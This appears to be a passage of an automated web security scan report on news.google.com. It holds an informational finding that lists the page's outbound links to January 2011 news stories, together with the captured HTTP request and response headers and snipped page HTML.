<span class="title"><a target="_blank" class="usg-AFQjCNEIKm4Fup2J5xjAnEf8e9q0nfSP0Q " href="http://www.nytimes.com/2011/01/18/opinion/18brooks.html" id="5024855345474111787"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIqQNaGnqPT81jx2kLrr0Da_XsHg " href="http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln" id="6107526647097459892"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEQX0__xR6F03eNBD80wQ9ztviVrQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html" id="6905605053023830163"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHmXxgsr2Peqa9XqIE5wJgWC0cf0w " href="http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162" id="-8119849514259291457"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGpLGEB4oQts2tE3LiQynQ3Z-K5RQ " href="http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844" id="7279004896616451596"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE6ybBw84x9uoypftV5tngJHzOltg " href="http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/" id="6382990014983290027"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG6VFJsd5LghOJQDRVmX0-Z39bpvg " href="http://mashable.com/2011/01/12/obsessed-with-facebook-infographic/" id="-5027991129252007488"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGefgxSphxOT7DWIJfYen2FHqVKeA " href="http://www.huffingtonpost.com/2011/01/13/new-zodiac-sign-dates-oph_n_808567.html" id="2526493708698605676"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGguw_7ImLDpzcb2GdQY0b690KAjA " href="http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html" id="6034302388163933602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG31ieJjehuVhbmm8A6VoEwB34ufg " href="http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/" id="-5002562622630809801"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEBCqmXL7Go4fAtoGveE-Ftib_JTA " href="http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html" id="5830623823895293286"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHctKe5Y-WBhY6hGZFBttgAQRB3-Q " href="http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/" id="1409758142476247527"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEkadxsOjF3ACMoM7ayuBEhtjIiRw " href="http://www.wired.com/threatlevel/2011/01/twitter/" id="-198025857784313602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFyXWaX3UnCdLqv5YPYdbvsndnWkg " href="http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages" id="-2612389445387481788"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEK4OuQ5vLuSdUivCvstxdy78zHhA " href="http://www.slate.com/id/2281146/" id="-303322691301458140"><span class="titletext">
...[SNIP]...
<div class="goog-menuitem" id="s-email"><img class="icon email-icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="15" height="15" alt="Share story by email"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-reader-titleurl" value="url"><img class="share-icon-reader icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Google Reader Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-fb-titleurl" value="u"><img class="share-icon-facebook icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Facebook Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-twitter-shareurl" value="http://twitter.com/home"><img class="share-icon-twitter icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Twitter Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-buzz-titleurl" value="url"><img class="icon share-icon-buzz" src="http://www.gstatic.com/news/img/cleardot.gif" alt="Buzz this story"><span class="sharing-link">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a> - <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

20.109. http://news.google.com/nwshp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.google.com
Path:	/nwshp

Issue detail

The page was loaded from a URL containing a query string:

http://news.google.com/nwshp?hl=en&tab=wn

The response contains the following links to other domains:

http://abcnews.go.com/Business/wireStory?id=12755356
http://abcnews.go.com/Entertainment/slideshow/photos-oprah-winfrey-secret-halfsister-patricia--12298302
http://abcnews.go.com/Health/MindMoodNews/family-secrets-emotions-oprah-winfreys-revelation/story?id=12751870
http://abcnews.go.com/US/president-obama-delivers-state-union-tonight-issue-important/story?id=12747572
http://af.reuters.com/article/investingNews/idAFJOE70O0EI20110125
http://allafrica.com/stories/201101250644.html
http://beargoggleson.com/2011/01/25/chicago-car-salesman-fired-for-wearing-packers-tie/
http://bits.blogs.nytimes.com/2011/01/18/now-at-starbucks-buy-a-latte-by-waving-your-phone/
http://bleacherreport.com/articles/584247-super-bowl-2011-everything-you-need-to-know-for-a-great-super-bowl-sunday/entry/44040-super-bowl-2011-should-you-pay-the-price-and-travel-to-dallas
http://blogs.wsj.com/marketbeat/2011/01/25/dupont-results-top-views-as-revenue-jumps/
http://content.usatoday.com/communities/popcandy/post/2011/01/what-do-you-think-of-the-oscar-nominations/1
http://content.usatoday.com/communities/theoval/post/2011/01/obama-loses-key-staffer-environmental-adviser-browner/1
http://content.usatoday.com/communities/theoval/post/2011/01/obamas-day-state-of-the-union-1/1
http://denver.sbnation.com/denver-broncos/2011/1/25/1954559/super-bowl-history-green-bay-packers-last-appearance-denver-broncos
http://edition.cnn.com/2011/WORLD/asiapcf/01/25/philippines.bus.bomb/
http://en.rian.ru/analysis/20110125/162296627.html
http://espn.go.com/nfl/notebook/_/page/lastcall1020/john-clayton-last-call
http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639
http://feeds.nytimes.com/click.phdo?i=4171574b1677b0877e85e5954148e69c
http://feeds.nytimes.com/click.phdo?i=c37a68a9d6c79074b075c0a6b2ae297e
http://feeds.nytimes.com/click.phdo?i=d9eba8e277eacecc0db34acc6c16eff7
http://googlenewsblog.blogspot.com/
http://gulfnews.com/news/region/palestinian-territories/pna-to-sue-al-jazeera-channel-1.751956
http://i.ytimg.com/vi/Ay5CfV-_438/default.jpg
http://i.ytimg.com/vi/CWAuaVf-QPI/default.jpg
http://i.ytimg.com/vi/F3y6v2G97pg/default.jpg
http://i.ytimg.com/vi/V36fQu0Vk80/default.jpg
http://i.ytimg.com/vi/ZfhFBl-goZk/default.jpg
http://in.reuters.com/article/idINIndia-54381820110125
http://jalopnik.com/5739333/president-kennedys-ambulance-is-a-fake
http://lifeinc.todayshow.com/_news/2011/01/25/5908197-nfl-playoffs-flash-strong-buy-signal-for-stocks
http://marquee.blogs.cnn.com/2011/01/24/oprahs-big-announcement/
http://mashable.com/2011/01/24/engaging-facebook-fans/
http://mashable.com/2011/01/24/the-history-of-social-media-infographic/
http://mashable.com/2011/01/25/apple-nfc-iphone-ipad/
http://money.cnn.com/2011/01/25/markets/premarkets/
http://montreal.ctv.ca/servlet/an/local/CTVNews/20110125/airport-bomb-moscow-110125/20110125/?hub=MontrealHome
http://msn.foxsports.com/nfl/story/Steelers-ground-Jets-head-to-Super-Bowl-XLV-80094778
http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/
http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/
http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/
http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/
http://news.cnet.com/8301-17852_3-20029276-71.html
http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706780.htm
http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706837.htm
http://newsfeed.time.com/2011/01/24/faithful-facebook-pope-benedict-blesses-social-networking/
http://newsfeed.time.com/2011/01/25/working-girl-to-royal-housewife-kate-middleton-quits-her-day-job/
http://nt0.ggpht.com/news/tbn/KH3wcH3fa03OHM/6.jpg
http://nt0.ggpht.com/news/tbn/VCZGlRd0xpHD1M/6.jpg
http://nt0.ggpht.com/news/tbn/YNo9KTUQtZTd9M/6.jpg
http://nt0.ggpht.com/news/tbn/iMpPYm2zLW2H9M/6.jpg
http://nt0.ggpht.com/news/tbn/mJexcsYegVtuIM/6.jpg
http://nt0.ggpht.com/news/tbn/sEKWE5k1cQjO7M/6.jpg
http://nt0.ggpht.com/news/tbn/tCst1ur0hPb3fM/6.jpg
http://nt0.ggpht.com/news/tbn/uH0w557Gx5vRRM/6.jpg
http://nt1.ggpht.com/news/tbn/-WrEkuynH2TOuM/6.jpg
http://nt1.ggpht.com/news/tbn/JQezVTDMGKi-tM/6.jpg
http://nt1.ggpht.com/news/tbn/KWy1eKrr9yjBVM/6.jpg
http://nt1.ggpht.com/news/tbn/cVcigKnuY3OZyM/6.jpg
http://nt1.ggpht.com/news/tbn/pdw41_LrPaNSwM/6.jpg
http://nt1.ggpht.com/news/tbn/qdO1rwvn09fEzM/6.jpg
http://nt1.ggpht.com/news/tbn/wd2GJA09xMOOhM/6.jpg
http://nt1.ggpht.com/news/tbn/ze_Jah1aKnczKM/6.jpg
http://nt2.ggpht.com/news/tbn/9nA0qAvPpJ5tCM/6.jpg
http://nt2.ggpht.com/news/tbn/oq6s9DrJF70jrM/6.jpg
http://nt3.ggpht.com/news/tbn/Z8UKO03JuMuYfM/6.jpg
http://nt3.ggpht.com/news/tbn/l2LZVd_dX5rO8M/6.jpg
http://nt3.ggpht.com/news/tbn/n7jseiULnXrLMM/6.jpg
http://nt3.ggpht.com/news/tbn/wxCcL8eCTK7UkM/6.jpg
http://nt3.ggpht.com/news/tbn/zzuaChiS-OW1xM/6.jpg
http://online.wsj.com/article/SB10001424052748703555804576101771527131098.html
http://online.wsj.com/article/SB10001424052748703555804576102810159169324.html
http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html
http://online.wsj.com/article/SB10001424052748704213404576100441609997236.html?mod=googlenews_wsj
http://online.wsj.com/article/SB10001424052748704698004576103613884707694.html
http://online.wsj.com/article/SB10001424052748704698004576103760527993764.html
http://online.wsj.com/article/SB20001424052748703555804576102350092762930.html
http://ozarksfirst.com/fulltext?nxd_id=392206
http://pittsburgh.sbnation.com/pittsburgh-steelers/2011/1/25/1954878/2011-super-bowl-pittsburgh-connections-green-bay-coaching-steelers-packers
http://tech.fortune.cnn.com/2011/01/25/today-in-tech-ipad-2-camera-nycs-new-digital-officer/?section=magazines_fortune
http://technolog.msnbc.msn.com/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up
http://thecrimereport.org/2011/01/25/tucson-shooting-turning-point-in-death-penalty-debate/
http://timesofindia.indiatimes.com/life-style/health-fitness/health/Lowering-BP-in-women-cuts-heart-disease-risk/articleshow/7361366.cms
http://today.msnbc.msn.com/id/41237457/ns/today-entertainment/
http://today.msnbc.msn.com/id/41248994/ns/today-entertainment/
http://travel.usatoday.com/destinations/dispatches/post/2011/01/london-businesses-are-pushing-royal-wedding-packages-souvenirs/139960/1
http://travel.usatoday.com/flights/post/2011/01/delta-adds-wisconsin-dfw-flights-for-super-bowl/140051/1
http://tunedin.blogs.time.com/2011/01/25/the-morning-after-second-skins/
http://tv.gawker.com/5735192/watch-ricky-gervais-extremely-uncomfortable-golden-globes-monologue
http://voices.washingtonpost.com/capitalsinsider/braden-holtby/another-strong-performance-by.html
http://voices.washingtonpost.com/dr-gridlock/2011/01/southbound_bw_parkway_blocked.html
http://watching-tv.ew.com/2011/01/24/skins-mtv-child-porn-jersey-shore/
http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/
http://www.ajc.com/business/moscow-blast-may-cause-815105.html
http://www.allheadlinenews.com/briefs/articles/90032000?McDonald%26%23146%3Bs%20hints%20of%20price%20increase%20this%20year
http://www.allheadlinenews.com/briefs/articles/90032032?Heart%20disease%20costs%20expected%20to%20triple%20by%202030
http://www.appleinsider.com/articles/11/01/25/apple_finalizing_wireless_e_wallet_for_iphone_5_ipad_2_report.html
http://www.associatedcontent.com/article/6262014/oprah_winfrey_reunites_with_halfsister.html
http://www.baltimoresun.com/news/sns-ap-us-oscar-nominations,0,4030183.story?track=rss
http://www.bbc.co.uk/go/rss/int/news/-/news/technology-12275750
http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12275942
http://www.bbc.co.uk/go/rss/int/news/-/newsbeat/12266806
http://www.bbc.co.uk/news/uk-12225163
http://www.bbc.co.uk/news/uk-12278369
http://www.bizjournals.com/milwaukee/morning_roundup/2011/01/pack-gear-flies-as-dallas-flights-added.html
http://www.bloomberg.com/news/2011-01-25/apple-plans-service-that-lets-iphone-users-pay-with-handsets.html
http://www.bloomberg.com/news/2011-01-25/cocoa-fluctuates-as-ivory-coast-permits-some-bean-exports-sugar-declines.html
http://www.bloomberg.com/news/2011-01-25/dupont-sees-year-eps-3-45-3-75-saw-3-30-3-60-est-3-51.html
http://www.boston.com/business/articles/2011/01/25/nutrition_information_aimed_at_package_fronts/
http://www.boston.com/sports/football/articles/2011/01/24/nfl_will_close_cowboys_stadium_roof_for_super_bowl/
http://www.businessweek.com/lifestyle/content/healthday/649165.html
http://www.businessweek.com/news/2011-01-25/ivory-coast-s-ouattara-to-let-already-taxed-cocoa-to-be-shipped.html
http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml
http://www.cbsnews.com/stories/2011/01/25/entertainment/main7280739.shtml
http://www.cbsnews.com/stories/2011/01/25/politics/main7280843.shtml
http://www.chron.com/disp/story.mpl/ap/top/all/7396519.html
http://www.cnn.com/2011/CRIME/01/25/police.officers.shot/
http://www.cnn.com/2011/POLITICS/01/24/obama.browner/
http://www.cnn.com/2011/TECH/web/01/25/do.not.track.features.fc/
http://www.cnn.com/2011/WORLD/meast/01/25/lebanon.protests/
http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844
http://www.computerworld.com/s/article/9205878/2011_Year_of_the_desktop_app_store_
http://www.csmonitor.com/World/terrorism-security/2011/0125/Moscow-terrorist-attack-blamed-on-airport-security-lapses
http://www.ctv.ca/CTVNews/World/20110117/middleton-wedding-dress-oldfield-110117/
http://www.ctv.ca/CTVNews/World/20110121/ivory-coast-gbagbo-orders-un-vehicles-searched-110121/
http://www.ctv.ca/CTVNews/World/20110123/obama-state-union-110123/
http://www.dailymail.co.uk/news/article-1350151/Kate-Middleton-prepares-Royal-housewife-life-leaving-parents-business.html?ito=feeds-newsxml
http://www.dallasnews.com/incoming/20110124-cowboys-owner-jerry-jones-excited-about-super-bowl-matchup.ece
http://www.dallasnews.com/sports/super-bowl/20110124-melded-together-steelers-fans-share-special-bond-forged-in-fire.ece
http://www.fool.com/investing/general/2011/01/21/the-outstanding-dividend-stock-im-buying-now.aspx
http://www.foxbusiness.com/markets/2011/01/19/ski-resorts-reap-profits-unlikely-sources/
http://www.foxbusiness.com/markets/2011/01/24/futures-hint-mini-pullback/
http://www.foxnews.com/us/2011/01/24/authorities-fear-cops-targeted-officers-shot-hours/?test=latestnews
http://www.foxnews.com/us/2011/01/25/earnings-decide-dow-breaks/
http://www.foxnews.com/world/2011/01/25/medvedev-says-security-bombed-airport-poor/
http://www.fudzilla.com/home/item/21654-firefox-google-chrome-adding-do-not-track-tools
http://www.gstatic.com/news/img/cleardot.gif
http://www.gstatic.com/news/img/favicon.ico
http://www.gstatic.com/news/img/logo/en_us/news.gif
http://www.guardian.co.uk/film/2011/jan/25/oscars-colin-firth
http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages
http://www.guardian.co.uk/world/2011/jan/25/palestine-papers-refugees-south-america
http://www.haaretz.com/news/diplomacy-defense/hamas-urges-palestinian-refugees-to-protest-over-concessions-on-right-of-return-1.339120
http://www.huffingtonpost.com/2011/01/20/hundreds-of-dead-birds-in_n_811709.html
http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html
http://www.huffingtonpost.com/2011/01/21/glenn-beck-target-frances_n_812268.html
http://www.huffingtonpost.com/2011/01/24/rahm-emanuel-mayor-chicago_n_813126.html
http://www.ibtimes.com/articles/104716/20110125/apple-iphone-visa-mastercard-paypal-ebay-ipad-iphone-5-ipad-2-nfc-itunes-iad-google-google-checkout-.htm
http://www.indystar.com/article/20110125/SPORTS03/101250341/Those-who-know-Cutler-well-have-his-back-over-injury?odyssey=tab%7Cmostpopular%7Ctext%7CSPORTS
http://www.informationweek.com/news/hardware/handheld/showArticle.jhtml?articleID=229100083&cid=RSSfeed_IWK_News
http://www.itproportal.com/2011/01/25/apple-app-store-goes-twitter/
http://www.jpost.com/DiplomacyAndPolitics/Article.aspx?id=205147
http://www.latimes.com/business/la-fi-0125-mcdonalds-20110124,0,874800.story
http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story
http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story
http://www.latimes.com/news/nationworld/nation/la-na-jared-loughner-20110125,0,2181209.story
http://www.latimes.com/news/nationworld/nation/la-na-tombstone-20110123,0,7161951.story
http://www.locksmithsportspicks.com/super-bowl-45-betting-odds/
http://www.marketingpilgrim.com/2011/01/google-ad-track-blocker-...keep-my-opt-outs...-is-live.html
http://www.marketwatch.com/story/mcdonalds-quarterly-profit-rises-2-2011-01-24?reflink=MW_news_stmp
http://www.marketwatch.com/story/us-stock-futures-hold-losses-after-housing-data-2011-01-25
http://www.marketwatch.com/story/us-stock-futures-slip-amid-earnings-deluge-2011-01-25?reflink=MW_news_stmp
http://www.mercurynews.com/business/ci_17186613
http://www.mobileburn.com/news.jsp?Id=12601
http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/
http://www.msnbc.msn.com/id/41241414/ns/us_news-wikileaks_in_security/
http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/
http://www.mtv.com/news/articles/1656569/skins-stars-despite-kissing-tony-tea-still-lesbian.jhtml
http://www.mtv.com/news/articles/1656582/2011-oscar-nominations.jhtml
http://www.myfoxchicago.com/dpp/news/metro/john-stone-car-salesman-fired-green-bay-packers-tie-chicago-20110125
http://www.nacsonline.com/NACS/News/Daily/Pages/ND0125111.aspx
http://www.newsweek.com/blogs/the-gaggle/2011/01/24/why-no-one-will-watch-the-state-of-the-union.html
http://www.npr.org/2011/01/25/133204546/the-root-why-obamas-speech-needs-to-play-it-safe
http://www.npr.org/blogs/thetwo-way/2011/01/25/133188453/loughner-pleads-not-guilty
http://www.npr.org/templates/story/story.php?storyId=133201226
http://www.nydailynews.com/entertainment/tv/2011/01/25/2011-01-25_skins_ep_2_recap_tea_tries_to_overcome_superiority_over_her_peers_group_faces_do.html
http://www.nydailynews.com/sports/football/jets/2011/01/25/2011-01-25_rex_ryan_jets_proved_they_werent_ready_for_super_bowl_when_they_failed_to_gain_o.html?r=sports
http://www.nytimes.com/2011/01/05/education/05tablets.html
http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln
http://www.nytimes.com/2011/01/25/business/25mcdonald.html?src=twrhp
http://www.nytimes.com/2011/01/25/sports/football/25moments.html
http://www.nytimes.com/2011/01/26/world/middleeast/26lebanon.html?src=mv
http://www.pcworld.com/article/217649/new_iphones_ipad_likely_to_become_ewallets.html
http://www.people.com/people/article/0,,20460315,00.html?xid=rss-topheadlines
http://www.people.com/people/package/article/0,,20395222_20459577,00.html
http://www.philly.com/philly/entertainment/20110125_Sideshow__Oprah_reveals_her_secret__A_half-sister.html
http://www.politico.com/news/stories/0111/48087.html
http://www.popfi.com/2011/01/25/oprahs-half-sister/
http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed
http://www.reuters.com/article/idUSLDE70O14P20110125
http://www.reuters.com/article/idUSN2416456020110124
http://www.reuters.com/article/idUSN2525117520110125
http://www.reuters.com/article/idUSN2525409520110125
http://www.reuters.com/article/idUSTRE70M0EM20110125
http://www.reuters.com/article/idUSTRE70N2DK20110125
http://www.reuters.com/article/idUSTRE70N2TQ20110124
http://www.reuters.com/article/idUSTRE70N73S20110124
http://www.reuters.com/article/idUSTRE70O04520110125?feedType=RSS&feedName=domesticNews
http://www.reuters.com/article/idUSTRE70O0CN20110125?feedType=RSS&feedName=topNews
http://www.reuters.com/article/idUSTRE70O1MV20110125
http://www.rttnews.com/Content/USCommentary.aspx?Id=1534946&SM=1
http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use
http://www.sltrib.com/sltrib/money/51114328-79/dow-percent-shares-12000.html.csp
http://www.star-telegram.com/2011/01/24/2793479/jerry-jones-switches-focus-to.html
http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html
http://www.switched.com/2011/01/25/google-mozilla-adding-new-do-not-track-features-to-browsers/
http://www.techtree.com/India/News/Mozilla_to_Add_Do-not-track_Feature_to_Firefox/551-114274-643.html
http://www.techtree.com/India/News/Next_iPhone_iPad_will_let_You_Make_Purchases/551-114271-893.html
http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html
http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/
http://www.thestreet.com/story/10983901/1/stock-futures-jan-25.html?cm_ven=GOOGLEN
http://www.tmz.com/2011/01/24/skins-schick-mtv-commercial-pulled-ptc/
http://www.tvfanatic.com/2011/01/skins-review-tea/
http://www.upi.com/Top_News/US/2011/01/25/Browner-to-leave-Obama-administration/UPI-70761295960281/
http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm
http://www.usatoday.com/travel/destinations/2011-01-20-dominican-republic-cheap-resort_N.htm
http://www.usatoday.com/yourlife/food/diet-nutrition/2011-01-25-foodfight25_ST_N.htm
http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html
http://www.voanews.com/english/news/africa/AU-Chief-in-Ivory-Coast-for-Talks-with-Rival-Leaders-114558329.html
http://www.voanews.com/english/news/asia/Philippines-Bus-Blast-Kills-2-114536154.html
http://www.voanews.com/english/news/middle-east/Hariri-Supporters-Gather-for-Day-of-Rage-in-Lebanon--114537104.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406094.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406343.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406396.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406470.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501926.html
http://www.wdel.com/story.php?id=31917
http://www.webmd.com/hypertension-high-blood-pressure/news/20110124/heart-benefits-for-women-who-cut-hypertension
http://www.whec.com/news/stories/S1941039.shtml?cat=566
http://www.wired.com/threatlevel/2011/01/twitter/
http://www.ynetnews.com/articles/0,7340,L-4018734,00.html
http://www.youtube.com/?hl=en&tab=n1
http://www.youtube.com/watch?v=AMxZxlkv-6o
http://www.youtube.com/watch?v=Ay5CfV-_438
http://www.youtube.com/watch?v=CWAuaVf-QPI
http://www.youtube.com/watch?v=Dye1RPvkcB0
http://www.youtube.com/watch?v=F3y6v2G97pg
http://www.youtube.com/watch?v=NJLHvIL-G4M
http://www.youtube.com/watch?v=OfNTrVD0N4c
http://www.youtube.com/watch?v=V36fQu0Vk80
http://www.youtube.com/watch?v=ZfhFBl-goZk
http://www.youtube.com/watch?v=ashZeYCLLKw
http://www.youtube.com/watch?v=bzno493XK5M
http://www.youtube.com/watch?v=eVzgsG-PBuQ
http://www.youtube.com/watch?v=pUzMhGLMFgQ
http://www.youtube.com/watch?v=yQEnVIJmHvM
http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/
http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162
http://www2.tbo.com/content/2011/jan/24/250400/cutlers-passion-questionable-not-his-toughness/

Request

GET /nwshp?hl=en&tab=wn HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=slGqRfC6ICTOdMJSwSFNt4jQCJaOi3R3pO1ScXdLgDi96Ki8QeVRuripgNFojNaoZJGR_YDCKit2vQhsNByxl3kULLF1ej8slk28PVNOZNkZz8MkBiOgS5YGoJNCtar1;Domain=.google.com;Path=/;Expires=Wed, 27-Jul-2011 14:25:24 GMT;HttpOnly
Date: Tue, 25 Jan 2011 14:25:24 GMT
Expires: Tue, 25 Jan 2011 14:25:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&topic=h&num=3&output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=ss&ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=w&ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&geo=detect_metro_area&ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=n&ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=b&ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=t&ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=e&ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=s&ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=m&ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=ir&ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
